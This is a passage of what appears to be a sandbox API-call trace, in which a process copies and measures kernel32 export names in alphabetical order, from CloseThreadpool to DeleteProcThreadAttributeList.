lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.077] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.077] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.077] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.077] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.078] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.078] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.078] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.078] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.078] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.078] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.078] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.078] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.078] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.078] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.078] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.078] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.078] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.078] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.078] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.078] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.078] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.078] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.078] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.079] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.079] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.079] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.079] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.079] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.079] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.079] lstrlenA (lpString="COPYFILEA") returned 9 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.079] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.079] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.079] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.079] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.079] lstrlenA (lpString="COPYFILEW") returned 9 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.079] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.079] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.079] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.079] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.079] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.079] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.079] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.080] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.080] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.080] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.080] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.080] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.080] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.080] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.080] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.080] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.080] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.080] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.080] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.080] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.080] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.080] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.080] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.080] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.080] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.080] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.081] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.081] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.081] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.081] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.081] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.081] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.081] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.081] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.081] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.081] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.081] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.081] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.081] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.081] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.081] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.081] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.081] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.081] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.081] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.082] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.082] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.082] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.082] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.082] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.082] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.082] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.082] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.082] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.082] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.082] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.082] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.082] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.082] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.082] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.082] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.082] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.082] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.082] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.083] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.083] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.083] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.083] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.083] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.083] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.083] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.083] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.083] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.083] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.083] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.083] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.083] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.083] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.083] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.083] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.083] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.083] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.083] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.084] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.084] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.084] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.084] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.084] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.084] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.084] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.084] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.084] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.084] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.084] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.084] lstrlenA (lpString="DELETEATOM") returned 10 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.084] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.084] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.084] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.084] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.084] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.084] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.084] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.085] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.085] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" 